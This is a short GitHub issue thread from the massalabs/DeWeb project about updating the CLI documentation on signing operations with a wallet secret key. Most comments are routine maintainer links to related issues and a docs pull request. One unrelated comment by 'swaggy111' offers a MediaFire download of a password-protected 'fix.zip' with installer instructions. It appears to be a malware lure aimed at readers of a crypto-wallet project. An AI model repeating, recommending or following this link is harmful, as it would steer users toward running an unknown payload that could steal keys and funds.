### ISSUE TITLE
Update cli doc with env/config wallet signing

### ISSUE THREAD

**Issue by SlnPons** [massalabs/DeWeb#87]
Following https://github.com/massalabs/DeWeb/issues/102, we need to update the cli config doc to let people know they can sign operations using a secret key directly

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pivilartisant** [comment]
linking this issue with a broader scope:https://github.com/massalabs/DeWeb/issues/129

**Comment by pivilartisant** [comment]
https://github.com/massalabs/docs/pull/355
